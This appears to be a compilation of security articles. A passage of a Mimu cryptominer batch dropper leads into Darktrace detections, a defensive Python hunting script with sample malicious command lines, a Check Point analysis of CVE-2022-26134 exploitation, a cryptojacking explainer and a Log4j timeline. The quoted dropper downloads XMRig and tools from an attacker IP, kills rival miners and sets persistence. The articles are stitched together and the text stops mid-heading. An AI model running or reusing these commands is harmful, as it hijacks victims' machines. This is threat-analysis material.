    if %EXP_MONER_HASHRATE% gtr 2 ( set PORT=10002 & goto PORT_OK)
    set port=10001

Preparing miner

    echo [*] Removing previous mimu miner (if any)
    sc stop gado_miner
    sc delete gado_miner
    taskkill /f /t /im xmrig.exe
    taskkill /f /t/im logback.exe
    taskkill /f /t /im network02.exe
    :REMOVE_DIR0
    echo [*] Removing “%USERPROFILE%\mimu6” directory
    timeout 5
    rmdir /q /s “USERPROFILE%\mimu6” >NUL 2>NUL
    IF EXIST “%USERPROFILE%\mimu6” GOTO REMOVE_DIR0

Download of XMRIG

    echo [*] Downloading MoneroOcean advanced version of XMRig to “%USERPROFILE%\xmrig.zip”
    powershell -Command “$wc = New-Object System.Net.WebClient; $wc.DownloadFile(‘http://141.85.161[.]18/xmrig.zip’, ;%USERPROFILE%\xmrig.zip’)”
    echo copying to mimu directory
    if errorlevel 1 (
    echo ERROR: Can’t download MoneroOcean advanced version of xmrig
    goto MINER_BAD)

Unpack and install

    echo [*] Unpacking “%USERPROFILE%\xmrig.zip” to “%USERPROFILE%\mimu6”
    powershell -Command “Add-type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(‘%USERPROFILE%\xmrig.zip’, ‘%USERPROFILE%\mimu6’)”
    if errorlevel 1 (
    echo [*] Downloading 7za.exe to “%USERPROFILE%za.exe”
    powershell -Command “$wc = New-Object System.Net.WebClient; $wc.Downloadfile(‘http://141.85.161[.]18/7za.txt’, ‘%USERPROFILE%za.exe’”
    powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”url\”: *\”.*\”,’, ‘\”url\”: \”207.38.87[.]6:3333\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
    powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”user\”: *\”.*\”,’, ‘\”user\”: \”%PASS%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
    powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”pass\”: *\”.*\”,’, ‘\”pass\”: \”%PASS%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
    powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”max-cpu-usage\”: *\d*,’, ‘\”max-cpu-usage\”: 100,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
    set LOGFILE2=%LOGFILE:\=\\%
    powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”log-file\”: *null,’, ‘\”log-file\”: \”%LOGFILE2%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
    if %ADMIN% == 1 goto ADMIN_MINER_SETUP
    if exist “%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup” (
    set “STARTUP_DIR=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”
    goto STARTUP_DIR_OK
    )
    if exist “%USERPROFILE%\Start Menu\Programs\Startup” (
    set “STARTUP_DIR=%USERPROFILE%\Start Menu\Programs\Startup”
    goto STARTUP_DIR_OK
    )
    echo [*] Downloading tools to make gado_miner service to “%USERPROFILE%\nssm.zip”
    powershell -Command “$wc = New-Object System.Net.WebClient; $wc.DownloadFile(‘http://141.85.161[.]18/nssm.zip’, ‘%USERPROFILE%\nssm.zip’)”
    if errorlevel 1 (
    echo ERROR: Can’t download tools to make gado_miner service
    exit /b 1

Detecting the campaign using Darktrace

The key model breaches Darktrace used to identify this campaign include compromise-focussed models for Application Protocol on Uncommon Port, Outgoing Connection to Rare From Server, and Beaconing to Rare Destination, along with file-focussed models for Masqueraded File Transfer, Multiple Executable Files and Scripts from Rare Locations, and Compressed Content from Rare External Location. Cryptocurrency mining is detected under the Cryptocurrency Mining Activity models. The models associated with Unusual PowerShell to Rare and New User Agent highlight the anomalous connections on the infected devices following the Log4j callbacks.

Customers with Darktrace’s Autonomous Response technology, Antigena, also had actions to block the incoming files and scripts downloaded and restrict the infected devices to their normal pattern of life to prevent both the initial malicious file downloads and the ongoing crypto-mining activity.
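The behaviours visible in the script excerpts above (scheduled-task persistence that runs a hidden PowerShell download cradle, removal of rival miners, downloads from a bare IP address, and rewriting of the XMRig config.json) can also be hunted for in process-creation logs. The following Python is an added example, not Darktrace's or the original article's code; the rule names, host names, task name, URLs and addresses are assumptions constructed for illustration.

```python
"""Hunt for miner-deployment behaviours in process-creation command lines."""
import re
from collections import defaultdict

# Constructed (host, command line) records. The command shapes follow the
# excerpts quoted above; hosts, task name, URLs and addresses are placeholders.
SAMPLE_EVENTS = [
    ("srv-app01",
     r'schtasks /create /sc MINUTE /mo 5 /tn “\Microsoft\windows\demo-task” '
     r'/tr “powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop '
     r'-c ‘IEX ((new-object net.webclient).downloadstring(”hxxps://paste.example[.]invalid/raw/PLACEHOLDER”))’” '
     r'/F /ru System'),
    ("srv-app01", r'taskkill /f /t /im xmrig.exe'),
    ("srv-app01",
     r'''powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://192.0.2[.]10/xmrig.zip', 'C:\Users\svc\xmrig.zip')"'''),
    ("srv-app01",
     r'''powershell -Command "$out = cat 'C:\Users\svc\mimu6\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-File -Encoding ASCII 'C:\Users\svc\mimu6\config.json'"'''),
    # Benign administration on another host: must not be flagged.
    ("wks-dev07", r'powershell -NoProfile -Command "Get-ScheduledTask | Where-Object State -eq Ready"'),
    ("wks-dev07", r'schtasks /create /sc DAILY /tn "Backup" /tr "C:\Tools\backup.exe" /ru System'),
    # A single weak signal (an admin killing a miner) stays below the threshold.
    ("srv-db02", r'taskkill /f /im xmrig.exe'),
]

SMART_QUOTES = str.maketrans({"“": '"', "”": '"', "‘": "'", "’": "'"})

# Every pattern in a rule must match the normalised command line.
RULES = {
    "ps_download_cradle": [
        r"powershell",
        r"download(string|file)\(",
        r"-(ep|executionpolicy)\s+bypass|-nop\b|-windowstyle\s+hidden",
    ],
    "schtasks_system_persistence": [
        r"schtasks\s+/create",
        r"/ru\s+system",
        r"/tr\s+.*powershell",
    ],
    "rival_miner_cleanup": [
        r"taskkill\b.*/im\s+(xmrig|logback|network02)\.exe",
    ],
    "xmrig_config_rewrite": [
        r"config\.json",
        r"-replace",
        r'(max-cpu-usage|log-file|url|user|pass)\\?"\s*:',
    ],
    "download_from_raw_ip": [
        r"https?://\d{1,3}(?:\.\d{1,3}){3}[:/]",
    ],
}


def normalize(cmd):
    """Undo report typography and defanging so one rule set matches both
    raw telemetry and command lines pasted from written reports."""
    cmd = cmd.translate(SMART_QUOTES).replace("[.]", ".")
    cmd = re.sub(r"hxxp", "http", cmd, flags=re.I)
    return re.sub(r"\s+", " ", cmd).strip().lower()


def classify(cmd):
    """Return the set of rule names whose patterns all match this command."""
    text = normalize(cmd)
    return {name for name, pats in RULES.items()
            if all(re.search(p, text) for p in pats)}


def hunt(events, min_behaviours=2):
    """Group hits per host; report hosts showing several distinct behaviours,
    since any single one of them is common in legitimate administration."""
    per_host = defaultdict(set)
    for host, cmd in events:
        per_host[host] |= classify(cmd)
    return {h: sorted(b) for h, b in per_host.items() if len(b) >= min_behaviours}


if __name__ == "__main__":
    for host, behaviours in hunt(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(behaviours)}")
```

Requiring at least two distinct behaviours per host keeps routine scheduled tasks and one-off clean-up commands out of the results.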
Appendix

Darktrace model detections

  • Anomalous Connection / Application Protocol on Uncommon Port
  • Anomalous Connection / New User Agent to IP Without Hostname
  • Anomalous Connection / PowerShell to Rare External
  • Anomalous File / EXE from Rare External location
  • Anomalous File / Masqueraded File Transfer
  • Anomalous File / Multiple EXE from Rare External Locations
  • Anomalous File / Script from Rare External Location
  • Anomalous File / Zip or Gzip from Rare External Location
  • Anomalous Server Activity / Outgoing from Server
  • Compliance / Crypto Currency Mining Activity
  • Compromise / Agent Beacon (Long Period)
  • Compromise / Agent Beacon (Medium Period)
  • Compromise / Agent Beacon (Short Period)
  • Compromise / Beacon to Young Endpoint
  • Compromise / Beaconing Activity To External Rare
  • Compromise / Crypto Currency Mining Activity
  • Compromise / Sustained TCP Beaconing Activity To Rare Endpoint
  • Device / New PowerShell User Agent
  • Device / Suspicious Domain

MITRE ATT&CK techniques observed

IoCs

On May 31, a critical unpatched vulnerability, which affects all supported versions of Confluence Server and Data Center, was reported to Atlassian by Volexity, a security company. Atlassian warned their customers of the critical vulnerability on June 2 and issued a patch a day later. CISA added this vulnerability to their list of Known Exploited Vulnerabilities on June 3. Check Point released a dedicated protection to prevent an attack exploiting this vulnerability and advises customers to patch the affected systems.

The Vulnerability

The vulnerability in the Atlassian Confluence and Data Center, designated as CVE-2022-26134, may lead to an unauthenticated Object-Graph Navigation Language (OGNL) expression injection attack. A remote, unauthenticated attacker can use this vulnerability to execute arbitrary code on the target server by placing a malicious payload in the URI.

Figure 1: Malicious payload that exploits CVE-2022-26134.
In The Wild Exploitation

Check Point Research (CPR) researchers noticed a large number of exploitation attempts since the vulnerability was published. At first, many of the would-be attackers used scanning methods to identify vulnerable targets. After a few days, the attackers started to use the vulnerability to download malware to the affected systems. Among the exploitation logs, researchers noticed a few malicious payloads that are related to the same campaign and that originated from the same source but targeted different platforms: Linux and Windows. The infection chain depends on the victim’s operating system.

The Linux OS Targeted Attack

The attacker utilized the Atlassian 0-day vulnerability by sending a crafted HTTP request to the victim.

Figure 2: A crafted HTTP request exploiting CVE-2022-26134 with a base64 encoded payload.

The base64 string decodes into another base64 encoded string. Overall, researchers had to decode the string a few times to get the actual payload.

Figure 3: The decoded base64 string.

This script downloads a bash script file called xms from the remote C&C server to the victim’s tmp folder, executes it, and deletes it afterward.

Figure 4: Part of the malicious xms script.

The xms file is a dropper script. It uninstalls running agents from the victim’s machine and adds itself to cron jobs to maintain persistence upon reboot. In addition, a network connectivity test to a[.]oracleservice.top is performed constantly. In an attempt to spread to other machines, the script searches for ssh keys and tries to connect. It then downloads the xms file from the C&C server and executes it. The script downloads an elf executable file called dbused to the tmp folder in various remote IPs. The dbused file is packed using upx to avoid static detection. The elf file is a crypto miner that exhausts the victim machine’s resources:

Figure 5: The dbused process exhausts the system resources.
The Windows OS Targeted Attack

The attacker utilized the Atlassian vulnerability to execute a PowerShell download cradle to initiate a fileless attack from a remote C&C server.

Figure 6: A crafted HTTP request exploiting CVE-2022-26134 using PowerShell commands.

The lol.ps1 script is injected to a PowerShell memory process. The script verifies the processor’s architecture, using wmi to check whether it matches its requirements. It then downloads an executable file called checkit2 to the tmp folder and runs it in hidden mode.

Figure 7: The lol.ps1 script.

The checkit2.exe process spawns a child process, called InstallUtil.exe, which connects to the C&C server. The InstallUtil.exe in turn spawns another child process, AddInProcess.exe, which is the crypto miner. After a few moments of running on the victim’s machine, the checkit2 process terminates itself.

Figure 8: The checkit2.exe process running on the system.

Figure 9: The InstallUtil.exe process running on the system.

The malware downloads a new copy of itself, with a new name, to the Start Menu folder.

Figure 10: The cloud.exe file downloaded to the Startup folder.

The crypto miner now runs on the machine and exhausts all the system’s resources:

Figure 11: Crypto wallet information.

Attack chain

Both attack scenarios start with an initial crafted HTTP request exploiting the CVE-2022-26134 vulnerability. The attacker executes commands using the Java execution function to download a malicious payload to the victim’s machine. The malicious payload then downloads an executable file according to the affected OS. Both executables run a crypto miner to utilize the victim’s resources for their own benefit.

Threat Actors

The a[.]oracleservice.top domain and the crypto wallet we extracted from the system are related to a cybercriminal group called the “8220 gang”.
Check Point Protections:

IPS: Atlassian Confluence Remote Code Execution (CVE-2022-26134)
Anti-Bot: Trojan.WIN32.XMRig

Cryptojacking explained: How to prevent, detect, and recover from it

Criminals are using ransomware-like tactics and poisoned websites to get your employees’ computers to mine cryptocurrencies. Here’s what you can do to stop it.

Cryptojacking definition

Cryptojacking is the unauthorized use of someone else’s compute resources to mine cryptocurrency. Hackers seek to hijack any kind of systems they can take over—desktops, servers, cloud infrastructure and more—to illicitly mine for crypto coins.

Regardless of the delivery mechanism, cryptojacking code typically works quietly in the background as unsuspecting victims use their systems normally. The only signs they might notice are slower performance, lags in execution, overheating, excessive power consumption, or abnormally high cloud computing bills.

How cryptojacking works

Coin mining is a legitimate process in the cryptocurrency world that releases new cryptocurrency into circulation. The process works by rewarding currency to the first miner who solves a complex computational problem. That problem completes blocks of verified transactions that are added to the cryptocurrency blockchain.

“Miners are essentially getting paid for their work as auditors. They are doing the work of verifying the legitimacy of Bitcoin transactions,” detailed a recent Investopedia explainer on how Bitcoin mining works.
“In addition to lining the pockets of miners and supporting the Bitcoin ecosystem, mining serves another vital purpose: It is the only way to release new cryptocurrency into circulation.”

Earning cryptocurrency via coin mining typically takes a huge amount of processing power and energy to carry off. Additionally, the cryptocurrency ecosystem is designed in a way that makes mining harder and reduces the rewards for it over time and with more mining competition. This makes legitimate cryptocurrency coin mining an extremely costly affair, with expenses rising all the time.

Cybercriminals slash mining overhead by simply stealing compute and energy resources. They use a range of hacking techniques to gain access to systems that will do the computational work illicitly and then have these hijacked systems send the results to a server controlled by the hacker.

Cryptojacking attack methods

The attack methods are limited only by the cryptojackers’ creativity, but the following are some of the most common ones used today.

Endpoint attacks

In the past, cryptojacking was primarily an endpoint malware play, existing as yet another moneymaking objective for dropping malware on desktops and laptops. Traditional cryptojacking malware is delivered via typical routes like fileless malware, phishing schemes, and embedded malicious scripts on websites and in web apps.

The most basic way cryptojacking attackers can steal resources is by sending endpoint users a legitimate-looking email that encourages them to click on a link that runs code to place a cryptomining script on their computer. It runs in the background and sends results back via a command and control (C2) infrastructure.

Another method is to inject a script on a website or an ad that is delivered to multiple websites. Once victims visit the website or the infected ad pops up in their browsers, the script automatically executes. No code is stored on the victims’ computers.
These avenues still remain a legitimate concern, though criminals have added significantly more sophisticated techniques to their cryptojacking playbooks as they seek to scale up profits, with some of these evolving methods described below.

Scan for vulnerable servers and network devices

Attackers seek to amp up the profitability of cryptojacking by expanding their horizons to servers, network devices, and even IoT devices. Servers, for example, are a particularly juicy target since they are usually higher powered than a run-of-the-mill desktop. They’re also a prime hunting ground in 2022 as the bad guys scan for servers exposed to the public internet that contain vulnerabilities such as Log4J, exploiting the flaw and quietly loading cryptomining software on the system that’s connected to the hacker’s servers. Often attackers will use the initially compromised system to move their cryptojacking laterally into other network devices.

“We’re seeing an uptick in cryptomining stemming from the Log4J vulnerability,” says Sally Vincent, senior threat research engineer for LogRhythm. “Hackers are breaking into networks and installing malware that uses storage to mine cryptos.”

Software supply chain attacks

Cybercriminals are targeting the software supply chain by seeding open-source code repositories with malicious packages and libraries that contain cryptojacking scripts embedded within their code. With developers downloading these packages by the millions around the globe, these attacks can rapidly scale up cryptojacking infrastructure for the bad guys in two ways. The malicious packages can be used to target developer systems—and the networks and cloud resources they connect to—to use them directly as illicit cryptomining resources. Or they can leverage these attacks to poison the software that these developers are building with components that execute cryptomining scripts on the machines of an application’s end user.
Leveraging cloud infrastructure

Many cryptojacking enterprises are taking advantage of the scalability of cloud resources by breaking into cloud infrastructure and tapping into an even broader collection of compute pools to power their mining activity. A study last fall by Google’s Cybersecurity Action Team reported that 86% of compromised cloud instances are used for cryptomining.

“Today, attackers are targeting cloud services by any means to mine more and more cryptocurrency, as cloud services can allow them to run their calculations on a larger scale than just a single local machine, whether they’re taking over a user’s managed cloud environment or even abusing SaaS applications to execute their calculations,” Guy Arazi, senior security researcher for Palo Alto Networks, wrote in a blog post.

One of the common methods to do this is by scanning for exposed container APIs or unsecured cloud storage buckets and using that access to start loading coin-mining software on impacted container instances or cloud servers. The attack is typically automated with scanning software that looks for servers accessible to the public internet with exposed APIs or unauthenticated access possible. Attackers generally use scripts to drop the miner payloads onto the initial system and to look for ways to propagate across connected cloud systems.

“The profitability and ease of conducting cryptojacking at scale makes this type of attack low-hanging fruit,” said Matt Muir, security researcher for Cado Security, in a blog post explaining that cloud-based attacks are particularly lucrative. “This will likely continue for as long as users continue to expose services such as Docker and Redis to untrusted networks.”

Why cryptojacking is popular

According to a report by ReasonLabs, in the last year 58.4% of all Trojans detected were cryptojacking coin miners.
Meantime, another study by SonicWall found that 2021 was the worst year to date for cryptojacking attacks, with the category logging 97.1 million attacks over the course of the year. These numbers are so strong because cryptojacking is virtually minting money for cybercriminals.

When a crook can mine for cryptocurrency on a seemingly limitless pool of free compute resources from victim machines, the upside for them is huge. Even with the precipitous drop in Bitcoin valuation this spring that brought it below the $30,000 level, cryptojackers’ illicit margins still make business sense as the value of what they mine far outstrips the costs of their criminal infrastructure.

Real-world cryptojacking examples

WatchDog targets Docker Engine API endpoints and Redis servers

A honeypot from the security research team at Cado Labs discovered a multi-stage cryptojacking attack that targets exposed Docker Engine API endpoints and Redis servers, and can propagate in a worm-like fashion. The attack is perpetrated by the WatchDog attack group, which has been particularly active in late 2021 and 2022 with numerous cryptojacking campaigns.

Alibaba ECS instances in cryptomining crosshairs

TeamTNT was one of the first hacking groups to shift cryptojacking focus heavily to cloud-oriented services. Researchers with TrendMicro in late 2021 reported that this group, along with rivals like the Kinsing gang, were conducting cryptojacking campaigns that installed miners in Alibaba Elastic Computing Service (ECS) instances and disabled security features to evade detection.

Miner bots and backdoors use Log4J to attack VMware Horizon servers

The Log4Shell vulnerability has been a boon to cryptojacking attackers in 2022.
In one marked example, Sophos researchers found earlier this year that a ‘horde’ of attackers were targeting VMware Horizon servers to deliver a range of cryptojacking payloads that included the z0Miner, the JavaX miner and at least two XMRig variants, Jin and Mimu cryptocurrency miner bots.

Supply chain attacks via npm libraries

The software supply chain security experts at Sonatype in fall of 2021 sounded the alarm on malicious cryptomining packages hiding in npm, the JavaScript package repository used by developers worldwide. At the time it found a trio of packages, at least one of which was impersonating a popular, legitimate library used by developers called “ua-parser-js,” which gets over 7 million weekly downloads and would be an ideal way to lure in developers to accidentally download a malicious bit of code and install it in their software.

A few months after that report, researchers at WhiteSource (now Mend) released an additional report that showed npm is swarming with malicious code—as many as 1,300 malicious packages that include cryptojacking and other nefarious behavior.

Romanian attackers target Linux machines with cryptomining malware

Last summer Bitdefender discovered a Romanian threat group that was targeting Linux-based machines with SSH credentials to deploy Monero mining malware. The tools they used were distributed on an as-a-service model. This example was on the spear tip of what appears to be a growing trend of Linux system cryptomining attacks. A report earlier this year from VMware detailed a growing targeting of Linux-based multi-cloud environments, particularly using the XMRig mining software.

“Many of the cryptomining samples from Linux-based systems have some relationship to the XMRig application,” explained the report, which showed that 89% of cryptomining attacks used XMRig-related libraries. “Therefore, when XMRig-specific libraries and modules in Linux binaries are identified, it is likely evidence of potential cryptomining behavior.
CoinStomp uses sophisticated evasion tactics

CoinStomp is another cryptojacking campaign recently discovered to be targeting Asian cloud service providers (CSPs). This one distinguished itself by its anti-forensics and evasion measures. These included timestomping to manipulate system timestamps, removal of system cryptographic policies, and the use of the /dev/tcp device file to create a reverse shell session, explained Cado’s Muir in a report on the attack.

Cryptocurrency farm found in warehouse

Cryptojackers can sometimes go to great lengths to steal not only processing power but also energy and network resources from corporate infrastructure. Last year Darktrace analysts highlighted an anonymous example from one of its clients where it discovered a cryptomining farm in a warehouse that was disguised inside an unassuming set of cardboard boxes. Inside was a stealthy rig running multiple GPUs that were hooked into the company’s network power,

How to prevent cryptojacking

As it has evolved into a multi-vector attack that spans across endpoint, server, and cloud resources, preventing cryptojacking takes an orchestrated and well-rounded defense strategy. The following steps can help prevent cryptojacking from running rampant on enterprise resources.

Employ strong endpoint protection: The foundation of that is using endpoint protection and anti-malware that’s capable of detecting cryptominers, as well as keeping web filters up to date and managing browser extensions to minimize the risk of browser-based scripts executing. Organizations should ideally look for endpoint protection platforms that can extend out to servers and beyond.

Patch and harden servers (and everything else). Cryptojackers tend to look for the lowest hanging fruit that they can quietly harvest—that includes scanning for publicly exposed servers containing older vulnerabilities.
Basic server hardening that includes patching, turning off unused services, and limiting external footprints can go a long way toward minimizing the risk of server-based attacks.

Use software composition analysis. Software composition analysis (SCA) tools provide better visibility into what components are being used within software to prevent supply chain attacks that leverage coin mining scripts.

Hunt down cloud misconfigurations. One of the most impactful ways organizations can stop cryptojacking in the cloud is by tightening cloud and container configurations. That means finding cloud services exposed to the public internet without proper authentication, rooting out exposed API servers, and eliminating credentials and other secrets stored in developer environments and hardcoded into applications.

How to detect cryptojacking

Cryptojacking is a classic low-and-slow cyberattack designed to leave minimal signs behind to avoid long-term detection. While endpoint protection platforms and endpoint detection and response technologies have come a long way in alerting to cryptojacking attacks, the bad guys are masters of evasion on this front and detecting illicit coin miners can still prove difficult, especially when only a few systems are compromised. The following are some additional methods for flagging signs of cryptojacking.

Train your help desk to look for signs of cryptomining. Sometimes the first indication on user endpoints is a spike in help desk complaints about slow computer performance. That should raise a red flag to investigate further, as could devices over-heating or poor battery performance in mobile devices.

Deploy a network monitoring solution. Network monitoring tools can offer a powerful tool in picking up on the kinds of web traffic and outbound C2 traffic that indicates cryptojacking activity, no matter the device it is coming from.
“If you have good egress filtering on a server where you’re watching for outbound connection initiation, that can be good detection for [cryptomining malware],” says Travis Farral, vice president and CISO at Archaea Energy. He warns, though, that cryptominer authors can write their malware to avoid that detection method.

Use cloud monitoring and container runtime security. Evolving tools like cloud monitoring and container runtime security scanning can offer additional visibility into cloud environments that may be impacted by unauthorized cryptominers. Cloud providers are baking in this kind of visibility into their service, sometimes as add-ons. For instance, Google Cloud expanded its Security Command Center earlier this year to include what it calls its Virtual Machine Threat Detection (VMTD) to pick up on signs of cryptomining in the cloud, among other cloud threats.

Engage in regular threat hunts. Since so many cryptojacking attacks are stealthy and leave few tracks, organizations may need to take more active measures like threat hunting to regularly seek out subtle signs of compromise and follow through with investigations.

“Endpoint security and SOC teams should invest time into active exercises and threat hunts instead of waiting around for something potentially catastrophic to happen,” LogRhythm’s Vincent says.

Monitor your websites for cryptomining code. Farral warns that cryptojackers are finding ways to place bits of Javascript code on web servers. “The server itself isn’t the target, but anyone visiting the website itself [risks infection],” he says. He recommends regularly monitoring for file changes on the web server or changes to the pages themselves.

How to respond to a cryptojacking attack

After illicit cryptomining activity has been detected, responding to a cryptojacking attack should follow standard cyber incident response steps that include containment, eradication, recovery, and lessons learned.
Some tips for how to respond to a cryptojacking attack include:

Kill web-delivered scripts. For in-browser JavaScript attacks, the solution is simple once cryptomining is detected: Kill the browser tab running the script. IT should note the website URL that’s the source of the script and update the company’s web filters to block it.

Shut down compromised container instances. Immutable cloud infrastructure like container instances that are compromised with coin miners can also be handled simply, by shutting down infected container instances and starting fresh. However, organizations must dig into the root causes that led to the container compromise in the first place. This means looking for signs that the container dashboard and credentials have been compromised and examining connected cloud resources for signs of compromise. A key step is ensuring that the fresh new container image to replace the old one isn’t similarly configured.

Reduce permissions and regenerate API keys. Eradicating and fully recovering from cloud-based cryptojacking will require organizations to reduce permissions to impacted cloud resources (and those connected to them) and regenerate API keys to prevent attackers from walking right back into the same cloud environment.

Learn and adapt. Use the experience to better understand how the attacker was able to compromise your systems. Update your user, helpdesk, IT, and SOC analyst training so they are better able to identify cryptojacking attempts and respond accordingly.

Editor’s note: This article, originally published in February 2018, has been updated to include new research, best practices, and cryptojacking examples.

The Apache Log4j vulnerabilities: A timeline

The Apache Log4j vulnerability has impacted organizations around the globe. Here is a timeline of the key events surrounding the Log4j exploit as they have unfolded.

The Apache Log4j vulnerability has made global headlines since it was discovered in early December.
The flaw has impacted vast numbers of organizations around the world as security teams have scrambled to mitigate the associated risks. Here is a timeline of the key events surrounding the Log4j vulnerability as they have unfolded.

Thursday, December 9: Apache Log4j zero-day exploit discovered

Apache released details on a critical vulnerability in Log4j, a logging library used in millions of Java-based applications. Attackers began exploiting the flaw (CVE-2021-44228) – dubbed “Log4Shell”, which was rated 10 out of 10 on the CVSS vulnerability rating scale. It could lead to remote code execution (RCE) on underlying servers that run vulnerable applications. “An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled,” Apache developers wrote in an advisory. A fix for the issue was made available with the release of Log4j 2.15.0 as security teams from around the globe worked to protect their organizations. Businesses were urged to install the latest version.

Friday, December 10: UK NCSC issues Log4j warning to UK organizations

As the fallout from the vulnerability continued, the UK’s National Cyber Security Centre (NCSC) issued a public warning to UK companies about the flaw and outlined strategies for mitigation. The NCSC advised all organizations to install the latest update immediately wherever Log4j was known to be used. “This should be the first priority for all UK organizations using software that is known to include Log4j. Organizations should update both internet-facing and non-internet facing software,” the statement read. Businesses were also urged to seek out unknown instances of Log4j and deploy protective network monitoring/blocking.

Saturday, December 11: CISA director comments on “urgent challenge to network defenders”

Much like the UK’s NCSC, the U.S.
Cybersecurity and Infrastructure Security Agency (CISA) publicly responded to the Log4j vulnerability with director Jen Easterly reflecting upon the urgent challenge it presented to network defenders. “CISA is working closely with our public and private sector partners to proactively address a critical vulnerability affecting products containing the Log4j software library,” she said in a statement.

“We are taking urgent action to drive mitigation of this vulnerability and detect any associated threat activity. We have added this vulnerability to our catalog of known exploited vulnerabilities, which compels federal civilian agencies – and signals to non-federal partners – to urgently patch or remediate this vulnerability. We are proactively reaching out to entities whose networks may be vulnerable and are leveraging our scanning and intrusion detection tools to help government and industry partners identify exposure to or exploitation of the vulnerability.”

CISA recommended that asset owners take three additional, immediate steps to help mitigate the vulnerability:

  • Enumerate any external facing devices that have Log4j installed
  • Ensure security operations centers are actioning every single alert on the devices that fall into the category above
  • Install a web application firewall with rules that automatically update so that security operations centers (SOCs) can concentrate on fewer alerts

Tuesday, December 14: Second Log4j vulnerability carrying denial-of-service threat detected, new patch released

A second vulnerability impacting Apache Log4j was discovered. The new exploit, CVE-2021-45046, allowed malicious actors to craft malicious input data using a JNDI lookup pattern to create denial-of-service (DoS) attacks, according to the CVE description.
A new patch for the exploit was made available which removed support for message lookup patterns and disabled JNDI functionality by default, with the Log4j 2.15.0 fix for the original flaw incomplete in certain non-default configurations.

“While CVE-2021-45046 is less severe than the original vulnerability, it becomes another vector for threat actors to conduct malicious attacks against unpatched or improperly patched systems,” Amy Chang, head of risk and response at Resilience, told CSO shortly after the flaw was discovered. “The incomplete patch to CVE-2021-44228 could be abused to craft malicious input data, which could result in a DoS attack. A DoS attack can shut down a machine or network and render it inaccessible to its intended users,” she added. Organizations were advised to update to Log4j 2.16.0 as soon as possible.

Friday, December 17: Third Log4j vulnerability revealed, new fix made available

Apache published details of a third major Log4j vulnerability and made yet another fix available. This was an infinite recursion flaw rated 7.5 out of 10. “The Log4j team has been made aware of a security vulnerability, CVE-2021-45105, that has been addressed in Log4j 2.17.0 for Java 8 and up,” it wrote. “Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect from uncontrolled recursion from self-referential lookups. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a StackOverflowError that will terminate the process.
This is also known as a DoS (denial-of-service) attack.”

Apache also outlined the following mitigations:

  • In PatternLayout in the logging configuration, replace Context Lookups like ${ctx:loginId} or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC)
  • Otherwise, in the configuration, remove references to Context Lookups like ${ctx:loginId} or $${ctx:loginId} where they originate from sources external to the application such as HTTP headers or user input

Monday, December 20: Log4j exploited to install Dridex and Meterpreter

Cybersecurity research group Cryptolaemus warned that the Log4j vulnerability was being exploited to infect Windows devices with the Dridex banking Trojan and Linux devices with Meterpreter. Dridex is a form of malware that steals bank credentials via a system that uses macros from Microsoft Word, while Meterpreter is a Metasploit attack payload that provides an interactive shell from which an attacker can explore a target machine and execute code. Cryptolaemus member Joseph Roosen told BleepingComputer that threat actors use the Log4j RMI (Remote Method Invocation) exploit variant to force vulnerable devices to load and execute a Java class from an attacker-controlled remote server.

Wednesday, December 22: Data shows 10% of all assets vulnerable to Log4Shell

Data released by cybersecurity vendor Tenable revealed that one in 10 of all assets were vulnerable to Log4Shell, while 30% of organizations had not begun scanning for the bug. “Of the assets that have been assessed, Log4Shell has been found in approximately 10% of them, including a wide range of servers, web applications, containers and IoT devices,” read a Tenable blog posting. “Log4Shell is pervasive across all industries and geographies. One in 10 corporate servers being exposed. One in 10 web applications and so on.
One in 10 of nearly every aspect of our digital infrastructure has the potential for malicious exploitation via Log4Shell.” The vendor warned that Log4Shell carries a greater potential threat than EternalBlue (exploited in the WannaCry attacks) because of the pervasiveness of Log4j across both infrastructure and applications. “No single vulnerability in history has so blatantly called out for remediation. Log4Shell will define computing as we know it, separating those that put in the effort to protect themselves and those comfortable being negligent,” it added.

Tuesday, January 4: FTC tells companies to patch Log4j vulnerability, threatens legal action

The Federal Trade Commission (FTC) urged U.S. organizations to patch the Log4Shell vulnerability immediately or risk facing punitive action from the agency. “When vulnerabilities are discovered and exploited, it risks a loss or breach of personal information, financial loss, and other irreversible harms. The duty to take reasonable steps to mitigate known software vulnerabilities implicates laws including, among others, the Federal Trade Commission Act and the Gramm Leach Bliley Act,” the FTC said. It added that it is critical that companies and their vendors relying on Log4j act now to reduce the likelihood of harm to consumers and to avoid FTC legal action. “The FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future.”

Monday, January 10: Microsoft warns of China-based ransomware operator exploiting Log4Shell

